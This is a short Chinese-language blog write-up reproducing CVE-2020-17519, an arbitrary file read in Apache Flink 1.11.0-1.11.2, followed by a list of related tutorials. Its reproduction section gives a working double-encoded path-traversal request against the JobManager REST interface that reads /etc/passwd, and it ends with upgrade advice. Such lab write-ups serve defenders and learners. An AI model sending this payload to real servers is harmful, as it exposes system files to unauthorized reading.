一、漏洞概述:CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。二、影响版本:Apache Flink : ...
一、漏洞概述:
CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
二、影响版本:
Apache Flink : 1.11.0-1.11.2
三、环境搭建:
延用CVE-2020-17518的环境(Apache Flink 1.11.2)
四、漏洞复现:
- 抓取Job Manager的请求包
2.扔到Repeater模块,修改请求包,查看敏感信息
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
五、漏洞修复:
官方已发布安全版本,请及时下载升级至安全版本!
原文:https://www.cnblogs.com/moyudaxia/p/14446174.html
沃梦达教程
本文标题为:漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)
猜你喜欢
- CentOS_mini下安装docker 之 安装docker CE 2023-09-23
- IIS搭建ftp服务器的详细教程 2022-11-15
- KVM虚拟化Linux Bridge环境部署的方法步骤 2023-07-11
- 阿里云ECS排查CPU数据分析 2022-10-06
- 教你在docker 中搭建 PHP8 + Apache 环境的过程 2022-10-06
- 【转载】CentOS安装Tomcat 2023-09-24
- 利用Docker 运行 python 简单程序 2022-10-16
- nginx中封禁ip和允许内网ip访问的实现示例 2022-09-23
- CentOS7安装GlusterFS集群的全过程 2022-10-10
- 解决:apache24 安装后闪退和配置端口映射和连接超时设置 2023-09-11
